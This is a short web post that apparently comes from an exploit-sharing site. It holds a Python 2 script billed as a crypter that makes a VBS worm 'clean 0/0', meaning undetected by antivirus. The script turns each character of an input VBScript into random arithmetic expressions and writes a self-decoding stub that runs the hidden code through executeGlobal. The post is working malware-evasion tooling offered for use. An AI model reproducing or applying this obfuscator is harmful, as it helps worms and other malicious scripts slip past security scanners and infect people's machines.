facebook facebook twitter rss

Crypter Patch && VBS Worm Clean 0/0

Author: Sec team , Published: 22-09-2015
#!/usr/bin/python
#Coded By isdo213
#Crypter Patch && VBS Worm Clean 0/0
import random, sys, string
if len(sys.argv) <> 3:
print "Usage: python obfuscator.py inFile.vbs outFile.vbs"
sys.exit()
splitter = str(chr(42))
NUM_OF_CHARS = random.randrange(150, 200)
pld = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
array = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
temp = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
x = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(NUM_OF_CHARS))
def obfu(body):
encBody = ""
for i in range(0, len(body)):
if encBody == "":
encBody += expr(ord(body[i]))
else:
encBody += "*" + expr(ord(body[i]))
return encBody
def expr(char):
range = random.randrange(1, 10001)
exp = random.randrange(0, 3)
if exp == 0:
print "Char " + str(char) + " -> " + str((range+char)) + "-" + str(range)
return str((range+char)) + "-" + str(range)
if exp == 1:
print "Char " + str(char) + " -> " + str((char-range)) + "+" + str(range)
return str((char-range)) + "+" + str(range)
if exp == 2:
print "Char " + str(char) + " -> " + str((char*range)) + "/" + str(range)
return str((char*range)) + "/" + str(range)
clear_text_file = open(sys.argv[1], "r")
obfuscated_file = open(sys.argv[2], "w")
obfuscated_file.write("Dim " + pld + ", " + array + ", " + temp + "\n")
obfuscated_file.write(pld + " = " + chr(34) + obfu(clear_text_file.read()) + chr(34) + "\n")
obfuscated_file.write(array + " = Split(" + pld + ", chr(eval(" + obfu(splitter) + ")))\n")
obfuscated_file.write("for each " + x + " in " + array + "\n")
obfuscated_file.write(temp + " = " + temp + " & chr(eval(" + x + "))\n")
obfuscated_file.write("next\n")
obfuscated_file.write("executeGlobal(" + temp + ")\n")
clear_text_file.close()
obfuscated_file.close()

print "Done!"

Like us on Facebook :